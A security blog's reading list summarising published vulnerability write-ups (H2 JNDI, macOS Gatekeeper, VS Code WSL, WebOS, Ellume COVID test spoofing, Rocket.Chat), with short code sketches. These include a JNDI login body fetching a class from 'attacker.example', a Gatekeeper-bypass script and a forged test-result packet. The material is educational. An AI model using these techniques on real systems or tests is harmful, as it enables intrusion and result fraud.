Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

The JNDI Strikes Back – Unauthenticated RCE in H2 Database Console- 731

Andrey Polkovnychenko & Shachar Menashe - JFrog    Reference →Posted 4 Years Ago
  • Log4Shell was a vulnerability in the Log4j library in Java. By simply adding a special format string to logged output, an attacker could trigger Java Naming and Directory Interface (JNDI) queries. This interface is quite powerful and can lead to remote code execution when it reaches out to fetch a remote Java class to execute. JNDI injection is a bug class in itself that has been seen before.
  • Since the Log4Shell vulnerability, the authors of this post decided to look for other, similar vulnerabilities. They started scanning open source repositories for JNDI injection vulnerabilities by searching for the dangerous sink javax.naming.Context.lookup. They found a very similar bug: several code paths pass unfiltered attacker-controlled URLs to the javax.naming.Context.lookup function.
  • As a result, a JDBC URL can be specified by the attacker. When that URL is resolved, a remote Java class can be returned and executed, leading to code execution. They found this vulnerability in several places within the H2 database engine.
  • In the H2 web-based console, the login form has two interesting fields: Driver Class and JDBC URL. By specifying a malicious class to be loaded, an attacker gets pre-auth code execution (almost by design) within the application. By default, though, the console only accepts local connections and should run only on localhost.
  • While looking through the SQL handling, they also noticed that the LINK_SCHEMA stored procedure passes driver and URL arguments directly into a vulnerable function. By setting this up properly, code execution can be achieved. However, this does require the ability to execute arbitrary queries on the database, which makes it less likely to occur in practice.
  • The fix for this is to prevent remote JNDI queries: only local calls should be allowed. To me, this seems feeble, but we will see if it stands the test of time.
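The console attack above boils down to submitting a login form whose driver/URL fields reach the JNDI sink. A minimal sketch of what such a request body might look like — the form field names (`driver`, `url`, `user`, `password`) and the `javax.naming.InitialContext` payload class are assumptions for illustration; the post only establishes that the Driver Class and JDBC URL fields reach `lookup()`:

```python
from urllib.parse import urlencode

def build_console_login(attacker_url: str) -> str:
    """Sketch of a malicious H2 console login body (field names assumed)."""
    fields = {
        "driver": "javax.naming.InitialContext",  # class whose lookup() becomes the JNDI sink
        "url": attacker_url,                      # attacker-controlled "JDBC URL"
        "user": "",
        "password": "",
    }
    return urlencode(fields)

body = build_console_login("ldap://attacker.example:1389/Exploit")
print(body)
```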

Where's the Interpreter!? (CVE-2021-30853)- 730

Patrick Wardle    Reference →Posted 4 Years Ago
  • File Quarantine, Gatekeeper, and Notarization on macOS are what prevent non-Apple-signed applications from running on a computer. In particular, this is meant to stop attacks where an application pretends to be Adobe Reader while actually stealing all of your files. Bypassing this leaves users at risk.
  • The root cause breaks down to a weird edge case in the system: a bash script that does not specify an interpreter. Given a script containing only a #! with no interpreter after it, macOS will gladly run it. But, for some reason, the missing interpreter bypasses the verification that macOS should do with the user protections mentioned above. Why does this happen?
  • When no interpreter is specified (#! only), an error is returned when exec_shell_imgact tries to handle the file. Since the file fails as a script, the system falls back to /bin/sh as the program to run.
  • Here's the kicker: macOS now thinks the binary being run is NOT a bash script but the platform binary /bin/sh. Since this is now a macOS binary instead of a bash script, the call to exec_shell_imgact never happens. Eventually, when this gets to the policy manager, syspolicyd, it decides that no security checks need to be made because it is NOT a script and is a trusted platform binary.
  • A super simple bug wrapped in layers of complexity. Sometimes, fuzzing and trying random things is the way to go instead of raw code review. Good find!
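The PoC shape described above is easy to recreate: a script whose shebang line names no interpreter at all. This is just a sketch of constructing such a file (the payload here is harmless); on the vulnerable macOS versions, the write-up says the script image activator rejects it, the system falls back to /bin/sh, and the quarantine checks are skipped:

```python
import os
import stat
import tempfile

# Build a script with a bare shebang: the interpreter is deliberately missing.
path = os.path.join(tempfile.mkdtemp(), "poc.sh")
with open(path, "w") as f:
    f.write("#!\n")            # "#!" alone -- no /bin/bash after it
    f.write("echo it ran\n")   # what /bin/sh ends up executing
os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)

with open(path) as f:
    first_line = f.readline()
print(first_line)
```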

RCE in Visual Studio Code's Remote WSL for Fun and Negative Profit- 729

Parsia - EA    Reference →Posted 4 Years Ago
  • WSL (Windows Subsystem for Linux) allows for Linux development without a virtual machine. Visual Studio Code runs in a server mode inside WSL to talk to the VS Code instance running in Windows. While setting this up, the author got a firewall dialog box on Windows, which piqued their interest. Down the rabbit hole we go!
  • VS Code was attempting to listen on 0.0.0.0, which makes it publicly reachable. After viewing what the commands were actually doing, the author noticed the word WebSocket on port 63574. From reading the scripts that boot the WebSocket server, no IP address was being specified! To them, this indicated that the exposure was likely an accident.
  • The reason WebSockets are interesting is that they are NOT bound by the Same-Origin Policy in the browser. As a result, modifications and data stealing can be performed if the security of the WebSockets is not handled properly. The author links 6+ other articles about this type of attack being done before. A lot of the time, they lead to RCE!
  • To test this, they simply set up a website that attempts to connect to this address on localhost. The server did not care about the Origin of the request during the initial testing.
  • The protocol being used over the WebSockets was its own beast, though. From looking at the traffic in Wireshark and the source code, they noticed DRM within the calls. Yikes! Luckily for the author, there is a pre-built extension that can be used to make the DRM calls. So, deep reversing was not really necessary since the hard work was being done by a library.
  • With an understanding of the protocol, we can mimic a VS Code client to the WSL side. Since the remote side has code execution BY DESIGN, this leads to a complete game over. How do we actually exploit this, though?
  • Via the WebSocket protocol, a Node Inspector instance can be created. Since this listens on all interfaces, all a victim has to do is visit our personal website to trigger the bug. Once the outside application or local website connects to the server, arbitrary code can be run on the machine. Another option is emulating the VS Code client directly, but this would require a ton of reverse engineering to figure out.
  • To fix this, the obvious choices are NOT listening on 0.0.0.0 and checking the Origin of the WebSocket upgrade request. The actual fix was to verify the connection token in the request, which was not being done properly before.
  • The author had a few other things that they tried that did not work out. First, they tried injecting environment variables into the system to pop a shell, which is possible via the protocol. They attempted a command injection via the execArgv variable as well, to no avail because of TypeScript. The URI handler was looked at to no avail as well. I appreciate that the thought process for these was included, even if they did not work.
  • Overall, this was a really good post on stumbling onto some functionality and going down the rabbit hole. These types of local desktop client issues are all over the place, and this is a good example of that.
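The Origin test above can be sketched as a raw WebSocket opening handshake carrying a cross-site Origin header (RFC 6455 format). A server that completes the upgrade regardless of this header is reachable from any page the victim visits; the request path and origin value here are illustrative, not from the post:

```python
import base64
import os

def build_ws_handshake(host: str, port: int, origin: str) -> bytes:
    """Raw WebSocket upgrade request with an attacker-controlled Origin."""
    key = base64.b64encode(os.urandom(16)).decode()  # random client key per RFC 6455
    lines = [
        "GET / HTTP/1.1",
        f"Host: {host}:{port}",
        "Upgrade: websocket",
        "Connection: Upgrade",
        f"Sec-WebSocket-Key: {key}",
        "Sec-WebSocket-Version: 13",
        f"Origin: {origin}",  # the header a safe server would validate
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()

req = build_ws_handshake("127.0.0.1", 63574, "https://attacker.example")
```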

V8 Heap pwn and /dev/memes - WebOS Root LPE- 727

David Buchanan    Reference →Posted 4 Years Ago
  • WebOS is the operating system used by LG TVs. Finding vulnerabilities in it may allow for the compromise of a TV. LG TVs include a built-in developer mode that lets users sideload applications inside a chroot jail with an SSH shell. The applications can contain either native code or HTML/JS.
  • V8 is the JavaScript and WebAssembly engine used in Chrome and other modern browsers. Since WebOS is heavily based upon Chrome, attacking V8 is a good vector. Long before this article was written, the author noticed the heavy usage of snapshot blobs. Snapshot blobs allow a previously created V8 context to be dynamically loaded to save time. So, what if we modified one before the application loads it?
  • It turns out that V8 assumes that the snapshots are benign! If you modify anything on the serialized V8 heap, such as the length of some buffer, it is taken as true. Using this primitive, we can trivially compromise the WebOS renderer and escalate our privileges out of the chroot jail.
  • The author draws on V8 exploitation write-ups from a CTF challenge featuring the same exact vulnerability: the overall exploit strategy is to get an RWX region via a JITed function. In general, though, the author corrupts the snapshot to create easy addrof() and fakeobj() primitives, then uses these to execute their own shellcode. To me, the interesting part was finding the bug in the first place.
  • With code execution in the context of WebOS's browser engine, we are looking good. However, this user does not run as root, so it is time for another LPE. In WebOS, the device /dev/mem is world-writable! This gives us direct access to the physical address space, which is the keys to the castle.
  • To actually exploit this, the author did a linear search of RAM for the process's struct cred. Once they found it, they elevated its creds to root by writing to /dev/mem directly. Another trick they had to use was finding the physical address ranges to scan by reading the contents of iomem_resource. Using this, they could find the proper task information to access, eventually modifying the task associated with their process.
  • Overall, this is an interesting article that took a small oversight in the usage of snapshots and turned it into a privilege escalation. Good work!
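The cred hunt above is essentially a pattern scan over physical memory. A minimal sketch of the idea against a synthetic buffer — the heuristic (eight consecutive 32-bit IDs equal to our uid, matching the uid/gid/suid/... run at the start of a struct cred) is an assumption for illustration, not the article's exact code:

```python
import struct

def find_cred_candidates(mem: bytes, uid: int) -> list:
    """Return offsets where 8 consecutive little-endian u32s equal `uid`,
    a rough signature for our process's struct cred in a memory dump."""
    needle = struct.pack("<8I", *([uid] * 8))
    hits, start = [], 0
    while (i := mem.find(needle, start)) != -1:
        hits.append(i)
        start = i + 4  # keep scanning past this hit
    return hits

# Synthetic demo: a zeroed "RAM dump" with one fake cred for uid 1000 at offset 32.
fake = bytearray(128)
fake[32:64] = struct.pack("<8I", *([1000] * 8))
offsets = find_cred_candidates(bytes(fake), 1000)
print(offsets)
```

On the real target, the exploit would overwrite those ID fields with 0 (root) through /dev/mem instead of just reporting offsets.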

Bypassing early 2000s copy protection for software preservation- 726

Paavo Huhtala     Reference →Posted 4 Years Ago
  • There was a Swedish children's video game series called Mulle Meck. This series released 5 games, but most of the CDs are gone, since this was in the late 90s. Luckily, these games are preserved on archive.org.
  • There is a problem with one of the games in the series, though: DRM. Mounting the disc image does absolutely nothing. Time to break DRM with modern technology!
  • The game does not run because of a copy protection known as SafeDisc 2; this was very common for the era. This DRM is easily identified by a magic string inside the main binary. The DRM itself is loaded via a driver, which was known to be riddled with security vulnerabilities.
  • The SafeDisc signature is within setup.exe, which boots the game. So, the author had an idea: "If SafeDisc is used on the installer, why don't we just install it ourselves?"
  • By extracting the game from the CD directly and mimicking the installation process, the game could be loaded without any DRM, but it came with a weird error message: The program is not installed correctly. Please run the installer again. This required some digging.
  • The author took out Ghidra but got lost in the sauce. The executable was not just a game: it was Adobe Shockwave Player (Macromedia Projector) with the game data simply appended to the end of the file. Instead of going down the Shockwave-altering route, they decided to use another tool: Procmon.
  • Procmon logs all of the WinAPI calls for the monitored application. After clicking through the tool for a while, they noticed a registry key access to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MulleHus.exe. If this key was not found, the application would crash, since it thought the game was not properly installed.
  • The final DRM check was whether specific files existed on the system running the game. If these files did not exist, the game would not run, as it assumed a bad installation. This was found via Procmon as well.
  • Most DRM bypasses are about modifying the actual game or breaking cryptography. In this case, the DRM was simply side-stepped by adding the expected files and skipping the installer.
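Mimicking the installer's registry footprint could look something like the fragment below. Only the key path comes from the post; the default value (the installed executable's path) is a placeholder assumption about what the installer would have written:

```reg
Windows Registry Editor Version 5.00

; Recreate the App Paths entry the game checks for at startup
; (install path below is illustrative, not from the write-up)
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MulleHus.exe]
@="C:\\Games\\MulleHus\\MulleHus.exe"
```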

Faking A Positive COVID Test- 725

Ken Gannon - FSecure    Reference →Posted 4 Years Ago
  • COVID tests are becoming more and more common. As with everything in the modern world, computer technology is being added to the tests. The Ellume COVID-19 Home Test was looked at in this case.
  • The analyzer itself was a custom board attached to a standard lateral flow test, with the custom board determining whether the user was COVID positive or negative. The analyzer would then inform the companion mobile app of the result.
  • The Android application had an un-exported activity, which can be interacted with on a rooted device. This activity appeared to be for debugging the application from the developer side. From looking at it, the author of the post learned a great deal about the Bluetooth communication.
  • There were two types of messages: STATUS and MEASUREMENT_CONTROL_DATA. Through further reverse engineering, they mapped out the data in each of the packets. The MEASUREMENT_CONTROL_DATA packet had line information, a test ID, a checksum, a CRC and many other values.
  • The STATUS packet had the status of the test (positive or negative), a measurement count and some other information. This was found by looking at the classes in the decompiled Android application.
  • How does somebody go about attacking this, though? Currently, the US government allows Ellume to administer COVID tests for events. Once the test has been taken, the phone application on the user's device is used to demonstrate the result of the test.
  • At this point, a malicious user could use Frida to hijack the flow of the application and alter the data returned from the test. Once the data has been changed and the CRC rewritten, a certificate with the fake result comes out.
  • To me, this flow is fundamentally flawed. If an attacker can store this information on their phone, then what stops them from making a completely altered version of the application? Or even their own phone app? In my opinion, the test should connect to a test administrator's phone instead of the user's.
  • To fix this problem, the authors told Ellume to implement further analysis to ensure that data spoofing is not possible. Additionally, obfuscation and OS checks should be done in the Android app. However, these are not true protections: they only slow attackers down. A redesign of the usage model would be required to truly fix this.
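The "change the byte, rewrite the CRC" step above is a generic pattern worth seeing once. A sketch assuming a CRC-32 trailer — the real device's packet layout and CRC variant are not public, so the offsets and algorithm here are illustrative only:

```python
import binascii
import struct

def patch_result(packet: bytes, result_byte: int, offset: int) -> bytes:
    """Flip one byte of a captured packet and recompute the trailing CRC-32
    so an integrity check over the payload still passes (layout assumed)."""
    body = bytearray(packet[:-4])   # payload without the old 4-byte CRC
    body[offset] = result_byte      # e.g. flip negative -> positive
    crc = binascii.crc32(bytes(body)) & 0xFFFFFFFF
    return bytes(body) + struct.pack("<I", crc)

# Fake 8-byte "all negative" packet with a valid CRC-32 trailer.
payload = bytes(8)
original = payload + struct.pack("<I", binascii.crc32(payload) & 0xFFFFFFFF)
forged = patch_result(original, 0x01, offset=4)
```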

How I found (and fixed) a vulnerability in Python- 724

Adam Goldschmidt    Reference →Posted 4 Years Ago
  • Many attack vectors focus on discrepancies: either between the verifier and the user, or between different points in a chain that each interpret the same data. Recent examples include HTTP Request Smuggling and Web Cache Poisoning.
  • The author of this article was trying to find issues where different components interpret the same data differently. They decided to focus on Flask, Bottle and Tornado, which are popular web frameworks.
  • The author noted that the URL parsing of these libraries differed. After discussing with members of the open source community, they were led to the standard Python library calls; in particular, urlparse in Python.
  • The urlparse module treats semicolons as query-string separators. However, most modern proxies only treat ampersands as separators. Practically, an attacker could separate query parameters using a semicolon (;) so that one server sees multiple query parameters while the other sees one fewer.
  • For instance, given the parameters ?link=http://google.com&utm_content=1;link='>alert(1), the Python side would see 3 query parameters: link, utm_content and link again. However, a modern proxy would only see link and utm_content. Neat! Cache desyncing!
  • The author created a pull request against CPython. This led to a change in Python 3.9 so that the semicolon (;) is no longer a separator. The original W3C recommendation for URLs allowed semicolons as separators; however, more recent recommendations only allow an ampersand.
  • Overall, a fairly good article, but I wish more details were given. Issues between steps like this one are not going away any time soon!
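The discrepancy is easy to demonstrate with the standard library itself. On patched Python (3.9.2+, with backports to earlier maintenance releases), `urllib.parse.parse_qs` splits on `&` only and exposes a `separator` parameter to opt back in to the old behavior:

```python
from urllib.parse import parse_qs

qs = "link=http://google.com&utm_content=1;link=evil"

# Patched Python splits on '&' only, so the ';' stays inside
# utm_content -- the same two parameters a modern proxy sees.
patched_view = parse_qs(qs)
print(patched_view)

# The pre-fix, semicolon-splitting behavior is still reachable explicitly:
legacy_view = parse_qs("a=1;b=2", separator=";")
print(legacy_view)
```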

Shamir’s Secret Sharing Vulnerabilities- 723

Filipe Casal & Jim Miller - Trail of Bits    Reference →Posted 4 Years Ago
  • Threshold signature schemes are protocols that allow a group of users to generate and control a private signing key. Using such a scheme, the users can jointly sign data, but no individual can do it alone.
  • Secret sharing is a protocol for splitting a secret key into key shares. These shares can be combined to recreate the key. A common technique for this is Shamir's Secret Sharing. The high-level idea behind Shamir's scheme is that for n users, you want at least t of them (where t <= n) to be able to recover the secret by combining their shares.
  • To make this work, a polynomial p of degree t-1 (so t users are necessary to recover the secret) is chosen over a finite field. The shares are created by evaluating the polynomial at n different points, one for each user. The key property is that a single point does not reveal any information about the polynomial.
  • Since the secret value is encoded in the polynomial, recovering the polynomial recovers the secret.
  • Since the constant term of the polynomial is the secret value, it is essential that the x-value of every share is non-zero. Otherwise, the secret is exposed directly. In many of the libraries, the implementation did not stop this from happening! So, it would be possible for the secret to get leaked to one of the share holders!
  • Many of the implementations let users choose a unique ID value as the x-coordinate of their share. Additionally, when you operate over a finite field, arithmetic is modulo the order of the field. This means that even if 0 itself was not allowed, a wrap-around (an ID equal to the field order) could be used to reach the zeroth point and find the key.
  • The second bug was a divide-by-zero. Many people forget that modular arithmetic involves division (inversion) as well. The authors of the libraries forgot to check for the 0 case, leading to crashes.
  • The authors noted that these algorithms have very few implementation standards. As a result, they created ZKDocs to help developers implement non-standardized cryptographic primitives.
  • Overall, this was an interesting attack that uses basic math to break implementations. I particularly appreciated the modulus wrap-around trick.
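The whole section fits in a few lines of code. A minimal sketch of Shamir's scheme over GF(P) — the prime and API are my own, not from any of the audited libraries — showing both that t shares recover the secret and that an x-coordinate of P (which wraps around to 0 mod P) hands a single share holder the secret directly:

```python
import random

P = 2**127 - 1  # a Mersenne prime; all arithmetic is in GF(P)

def make_shares(secret: int, t: int, xs):
    """Evaluate a random degree t-1 polynomial with p(0) = secret at each
    x in xs. The x-values MUST be non-zero mod P, because p(0) IS the secret."""
    coeffs = [secret] + [random.randrange(P) for _ in range(t - 1)]
    return [(x, sum(c * pow(x, i, P) for i, c in enumerate(coeffs)) % P)
            for x in xs]

def recover(shares):
    """Lagrange interpolation at x = 0. The modular inverse pow(den, P-2, P)
    is the division step that crashes when den == 0 (the second bug class)."""
    secret = 0
    for i, (xi, yi) in enumerate(shares):
        num = den = 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                num = num * (-xj) % P
                den = den * (xi - xj) % P
        secret = (secret + yi * num * pow(den, P - 2, P)) % P
    return secret

secret = 123456789
shares = make_shares(secret, t=3, xs=[1, 2, 3, 4, 5])
assert recover(shares[:3]) == secret  # any 3 of 5 shares suffice

# The wrap-around bug: an ID of P reduces to 0 mod P, so that one share's
# y-value is p(0) -- the secret itself, no threshold needed.
leaky = make_shares(secret, t=3, xs=[P])
assert leaky[0][1] == secret
```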

Rocket.Chat Client-side Remote Code Execution- 714

SSD    Reference →Posted 4 Years Ago
  • Rocket.Chat is an open source variation of Slack: a team-based messaging service with many collaboration tools built in. Rocket.Chat has a desktop application built on Electron.
  • The desktop application allows for same-host navigation. This means that any link to the same host will be opened in the desktop application itself. By itself, this is not a problem. But what if we can get something we control to be opened in Electron?
  • Rocket.Chat allows users to upload files to locations such as S3, GCloud and other storage back-ends. By using a URI redirect that points to an uploaded file containing JavaScript, the code will be executed within the application!
  • Since the line between client-side JavaScript and desktop programming is quite blurred in Electron, this XSS gives access to the host! Using it, files, passwords or whatever else the attacker wants could be stolen from the desktop application.
  • Electron apps are hard to lock down. Developers need to be careful with XSS and redirects specifically.